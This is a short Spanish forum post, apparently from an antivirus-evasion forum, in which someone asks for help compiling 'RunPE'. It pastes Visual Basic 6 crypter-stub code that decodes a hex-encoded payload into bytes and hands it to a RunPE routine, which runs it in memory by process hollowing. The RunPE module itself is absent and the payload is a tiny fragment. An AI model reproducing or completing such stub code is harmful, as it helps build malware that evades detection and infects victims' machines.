no puedo compilar runpe puedo añadir archivos al proyecto y voy a pegar demasiado
[Enlace externo eliminado para invitados]
http://www.indetectables.net/viewtopic.php?f=96&t=43005
Dim nt() As Byte
Sub C0nv3Rt()
Dim Fil0 As String
Fil0 = Fil0 & "530ED3D4CFA49A893D2E4E9750EE0BD48"
Fil0 = Fil0 & "AA95F1C0271DF7175C2C87AF1D"
nt() = HexStringToByteArray(Fil0)
End Sub
Public Function HexStringToByteArray(ByRef HexString As String) As Byte()
Dim bytOut() As Byte, bytHigh As Byte, bytLow As Byte, lngA As Long
If LenB(HexString) Then
ReDim bytOut(Len(HexString) \ 2 - 1)
For lngA = 1 To LenB(HexString) Step 4
bytHigh = AscW(MidB$(HexString, lngA, 2)) - 48
bytLow = AscW(MidB$(HexString, lngA + 2, 2)) - 48
If bytHigh > 9 Then bytHigh = bytHigh - 7
If bytLow > 9 Then bytLow = bytLow - 7
bytOut(lngA \ 4) = (bytHigh * &H10) Or bytLow
Next lngA
HexStringToByteArray = bytOut
End If
End Function
Public Function Runner()
Call Module1.RunPE(nt(), App.Path & "\" & App.EXEName & ".exe", vbNullString)
End Function